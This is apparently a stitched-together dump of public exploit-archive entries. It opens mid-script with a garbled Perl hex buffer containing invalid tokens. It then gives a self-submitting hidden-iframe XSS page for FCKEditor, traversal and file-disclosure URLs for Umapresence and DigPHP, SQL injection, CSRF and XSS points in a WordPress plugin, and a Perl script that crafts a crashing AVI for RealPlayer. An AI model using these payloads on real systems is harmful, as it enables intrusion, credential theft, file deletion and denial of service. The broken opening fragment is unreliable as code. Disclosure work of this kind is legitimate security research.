4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f";
open ($File, ">$file");
print $File $cr;
close ($File);
source: https://www.securityfocus.com/bid/54188/info
FCKEditor is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
source: https://www.securityfocus.com/bid/54194/info
Umapresence is prone to a local file-include vulnerability and an arbitrary file-deletion vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit a local file-include vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Attackers can exploit an arbitrary file-deletion vulnerability with directory-traversal strings ('../') to delete arbitrary files; this may aid in launching further attacks.
Umapresence 2.6.0 is vulnerable; other versions may also be affected.
http://www.example.com/umapresence/umaservices/uma_editor/inc/insert_doc.pop.php?dos=../../style
source: https://www.securityfocus.com/bid/54204/info
Schoolhos CMS is prone to an arbitrary file-upload vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could exploit these issues to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server.
Schoolhos CMS 2.29 is vulnerable; other versions may also be affected.
http://www.example.com/schoolhos/index.php?p=detberita&id=xxx [XSS]
source: https://www.securityfocus.com/bid/54207/info
DigPHP is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.
http://www.example.com/dig.php?action=file&dir=
# Exploit Title: Albo Pretorio Online 3.2 Multiple Vulnerabilities
# Google Dork: inurl:/?action=visatto
# Date: 09/06/2015
# Exploit Author: Alessandro Cingolani
# Vendor Homepage: http://plugin.sisviluppo.info/
# Software Link: https://downloads.wordpress.org/plugin/albo-pretorio-on-line.3.2.zip
# Version: 3.2
# Tested on: Firefox on Ubuntu 64 bit
==============
Introduction
==============
Albo Pretorio Online is a simple wordpress plugin that allows to manage an official bulletin board (albo). For an Italian law publishing an albo on institutional sites become compulsory in 2009. This made the plugin very popular in the institutional enviroment due to the fact that it is the only one present in the official channels. The plugin suffers from an unauthenticated SQL Injection and other various authenticated vulnerabilities, such as XSS and CSRF. In fact the back-end does not sanitize any input/output, so many vulnerabilities are present.
=============
Front-End
=============
SQL Injection :
http://victim.com/albo-folder/?action=visatto&id=[Inject Here]
============
Back-End
============
In the back-end, no protection against SQL Injection, XSS and CSRF exists. This are just few examples
Blind SQL-Injection
====================
http://victim.com/wp-admin/admin.php?page=responsabili&action=edit&id=[Inject Here]
http://victim.com/wp-admin/admin.php?page=atti&action=view-atto&id=[Inject Here]
CSRF
=====
In the back-end, the item deletion is not protected, so any element (acts, responsibles, etc.) could be deleted.
POC:
Responsible deletion
http://victim.com/wp/wp-admin/admin.php?page=responsabili&action=delete-responsabile&id=***responsabile's id***
Act deletion
http://victim.com/wp/wp-admin/admin.php?page=atti&action=annulla-atto&id=***atto's id***
Stored XSS
===========
This plugin does not sanitize any output so each form input, except email, is vulnerable to stored XSS.
Also some Reflected XSS and a possible Shell Uploading vulnerabilities were discovered and fixed.
Timeline
=========
9/06/2015 - Vulnerabilities found. Developer Informed
17/06/2015 - Patch Relased (Version 3.3)
02/07/2015 - Exploit disclosed
source: https://www.securityfocus.com/bid/54220/info
Real Networks RealPlayer is prone to a remote denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.
RealPlayer 10 Gold is vulnerable; other versions may also be affected.
#------------------------------------------------------------------------#
# #
# Usage : perl realplayer.pl #
# #
#------------------------------------------------------------------------#
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff";
#[Disassembly]
#"\x0C\x20\x87\x74" PUSH EBX
#"\x0D\x20\x87\x74" MOV EAX,DWORD PTR SS:[EBP+8]
#"\x10\x20\x87\x74" MOV EBX,DWORD PTR SS:[EBP+C]
#"\x13\x20\x87\x74" MOV ECX,DWORD PTR SS:[EBP+10]
#"\x16\x20\x87\x74" MUL EBX
#"\x18\x20\x87\x74" MOV EBX,ECX
#"\x1A\x20\x87\x74" SHR EBX,1
#"\x1C\x20\x87\x74" ADD EAX,EBX
#"\x1E\x20\x87\x74" ADC EDX,0
#"\x21\x20\x87\x74" DIV ECX <<---- As we see we can't devise by Zero .So this occurs an error and the program crashes here .
#[Registers]
#EAX 00000000
#ECX 00000000
#EDX 00000000
#EBX 00000000
# error : Integer Division by Zero ---> Exception handling vulnerability .
# This Exception handling can lead to a DOS attack . However The Concept of using this vulnerability is the create an exception so the program crashes.And it's a local exploit .
my $file = "exploit.avi";
open ($File, ">$file");
print $File $h;
close ($File);
print "0/// Exploit By Dark-Puzzle ! \n";
print "1/// Follow me : http://fb.me/dark.puzzle \n";
print "0/// avi file Created Enjoy! \n";
print "N.B : If the program says to locate the file just browse into it's directory and select it , if not , Enjoy\n";
# End Of Exploit
#--------------------